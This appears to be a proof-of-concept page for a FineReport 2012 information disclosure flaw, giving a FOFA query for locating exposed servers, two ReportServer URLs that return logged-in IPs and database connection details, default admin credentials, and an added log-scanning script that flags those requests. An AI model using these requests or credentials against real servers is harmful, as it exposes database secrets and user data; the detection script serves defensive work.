Awesome-POC/OA产品漏洞/帆软报表 2012 信息泄露漏洞.md
2022-02-21 09:35:01 +08:00


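# FineReport (帆软报表) 2012 Information Disclosure Vulnerability
## Vulnerability Description
FineReport 2012 has an information disclosure vulnerability: accessing specific URLs returns some sensitive information.
## Affected Versions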
```
FineReport 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## Vulnerability Reproduction
Obtain the IPs logged in to the report system:
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```
![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png)
Database information disclosure:
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```
![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png)
Default back-end credentials: admin/123456
```plain
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
```
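
To check whether the two information-disclosure requests above have already been made against a server, the following added example (not part of the original page) scans web access logs for them. It assumes Combined Log Format; the sample log lines, including the `/WebReport` prefix and the `reportlet` request, are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# fr_server commands this page lists as leaking data, with what each exposes.
SENSITIVE_CMDS = {
    "sc_visitstatehtml": "IPs logged in to the report system",
    "sc_getconnectioninfo": "database connection information",
}
# Assumed layout: Combined Log Format (client IP, time, request line, status).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(target):
    """Return the sensitive cmd a request target invokes, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().rstrip("/").endswith("/reportserver"):
        return None
    # parse_qs percent-decodes and ignores parameter order; names and values
    # are compared case-insensitively so that the match errs toward alerting.
    q = {k.lower(): v[-1].lower() for k, v in parse_qs(parts.query).items()}
    if q.get("op") == "fr_server" and q.get("cmd") in SENSITIVE_CMDS:
        return q["cmd"]
    return None

def scan(lines):
    """Return one finding per log line that requested a sensitive cmd."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        cmd = classify(m["target"]) if m else None
        if cmd:
            hits.append({"ip": m["ip"], "ts": m["ts"], "cmd": cmd,
                         "leaks": SENSITIVE_CMDS[cmd],
                         "served": m["status"] == "200"})
    return hits

# Constructed sample log lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Feb/2022:11:30:26 +0800] "GET /ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Feb/2022:11:30:41 +0800] "GET /WebReport/ReportServer?cmd=sc%5Fgetconnectioninfo&op=FR_SERVER HTTP/1.1" 200 734',
    '198.51.100.20 - - [09/Feb/2022:11:31:02 +0800] "GET /ReportServer?reportlet=sales.cpt HTTP/1.1" 200 20480',
    '198.51.100.9 - - [09/Feb/2022:11:32:10 +0800] "GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding with `served` set to true means the server answered with status 200, so the data named in `leaks` should be treated as exposed to that client and any database credentials it covers rotated.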